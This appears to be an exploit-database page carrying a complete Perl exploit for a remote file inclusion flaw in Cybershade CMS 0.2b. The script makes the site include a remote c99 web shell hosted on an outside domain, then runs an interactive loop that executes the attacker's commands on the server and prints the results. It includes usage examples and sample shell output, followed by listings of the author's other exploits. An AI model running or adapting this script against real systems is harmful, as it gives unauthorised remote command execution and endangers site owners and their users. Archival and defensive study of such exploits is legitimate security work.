Menu

Search for hundreds of thousands of exploits

"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion"

Author

Exploit author

JosS

Platform

Exploit platform

php

Release date

Exploit published date

2009-01-05

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/perl
####################################################################
# Cybershade CMS 0.2b (index.php) RFI shell_cmd[c99] Exploit
# url: http://sourceforge.net/projects/cybershadecms/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com
# team: Spanish Hackers Team - [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# "need" register_globals = On
#
# RFI vuln!: [index.php]
#    line 6: include $THEME_header;
#    line 8: include $THEME_footer;
#
####################################################################
# OUTPUT:
#
# [shell]:~$ id
#   uid=99(nobody) gid=99(nobody) groups=99(nobody)
# [shell]:~$ uname -a
#   Linux xxxxx.xxxxx.com 2.6.18-92.1.13.el5PAE #1 SMP Wed Sep 24 20:07:49 EDT 2008 i686 i686 i386 GNU/Linux
# [shell]:~$ 0h my God ;D

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}

&clear();

sub banner {
        &clear();
	print "[x] Cybershade CMS 0.2b (index.php) RFI shell_cmd[c99] Exploit\n";
	print "[x] Written By JosS\n";
	print "[x] sys-project[at]hotmail[dot]com\n\n";
	print "[+] Usage:\n";
	print "[+]     $0 -vuln \"web+path\" -shell \"shell\"\n";
	print "[+] eX: $0 -vuln \"http://www.p0c.com/cms/\" -shell \"http://hack0wn.com/desc/shells/c99.txt?\"\n\n";
        exit();
}

my $options = GetOptions (
  'help!'            => \$help, 
  'vuln=s'            => \$vuln, 
  'shell=s'            => \$shell
  );

&banner unless ($vuln);
&banner unless ($shell);

&banner if $banner eq 1;

chomp($vuln);
chomp($shell);

while (){

	print "[shell]:~\$ ";
	chomp($cmd=<STDIN>);

	if ($cmd eq "exit" || $cmd eq "quit") {
		exit 0;
	}

	my $ua = LWP::UserAgent->new;
        $iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
        chomp($iny);
        my $own = $vuln . "/index.php?THEME_header=" . $shell . $iny;
        chomp($own);
	my $req = HTTP::Request->new(GET => $own);
	my $res = $ua->request($req);
	my $con = $res->content;
	if ($res->is_success){
		print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
	}
           else
             {
                print "[p0c] Exploit failed\n";
                exit(1);
             }
}

# __h0__

# milw0rm.com [2009-01-05]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2012-06-16 "Simple Document Management System 1.1.5 - Multiple SQL Injections" webapps php JosS
2010-09-10 "symphony 2.0.7 - Multiple Vulnerabilities" webapps php JosS
2010-08-29 "Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusions" webapps php JosS
2010-07-22 "AJ HYIP MERIDIAN - 'news.php?id' Blind SQL Injection" webapps php JosS
2010-07-22 "AJ HYIP PRIME - 'welcome.php?id' Blind SQL Injection" webapps php JosS
2010-04-16 "SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting" webapps php JosS
2010-03-29 "xwine 1.0.1 - '.exe' Local Crash (PoC)" dos linux JosS
2010-03-27 "Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute" webapps php JosS
2010-03-05 "E-topbiz Link ADS 1 PHP script - 'linkid' Blind SQL Injection" webapps php JosS
2010-03-03 "MiNBank 1.5.0 - Remote Command Execution" webapps php JosS
2009-06-24 "PHPEcho CMS 2.0-rc3 - 'forum' Cross-Site Scripting Cookie Stealing / Blind SQL Injection" webapps php JosS
2009-06-24 "LightOpenCMS 0.1 - 'smarty.php?cwd' Local File Inclusion" webapps php JosS
2009-04-20 "Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload" webapps php JosS
2009-04-16 "SMA-DB 0.3.13 - Multiple Remote File Inclusions" webapps php JosS
2009-02-23 "pPIM 1.01 - 'notes.php' Remote Command Execution" webapps php JosS
2009-02-06 "1024 CMS 1.4.4 - Remote Command Execution / Remote File Inclusion" webapps php JosS
2009-02-04 "GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup" webapps asp JosS
2009-02-04 "gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass" webapps php JosS
2009-01-05 "Cybershade CMS 0.2b - 'index.php' Remote File Inclusion" webapps php JosS
2008-11-25 "Clean CMS 1.5 - Blind SQL Injection" webapps php JosS
2008-11-03 "pppBlog 0.3.11 - File Disclosure" webapps php JosS
2008-11-02 "Maran PHP Shop - 'prod.php' SQL Injection" webapps php JosS
2008-11-02 "Maran PHP Shop - 'admin.php' Insecure Cookie Handling" webapps php JosS
2008-11-01 "Bloggie Lite 0.0.2 Beta - Insecure Cookie Handling / SQL Injection" webapps php JosS
2008-10-23 "aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities" webapps php JosS
2008-10-21 "LightBlog 9.8 - 'GET' / 'POST' / 'COOKIE' Local File Inclusion" webapps php JosS
2008-10-16 "IP Reg 0.4 - Multiple SQL Injections" webapps php JosS
2008-10-16 "Kure 0.6.3 - 'index.php' Local File Inclusion" webapps php JosS
2008-10-15 "myEvent 1.6 - 'eventdate' SQL Injection" webapps php JosS
2008-10-15 "mystats - 'hits.php' Multiple Vulnerabilities" webapps php JosS
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.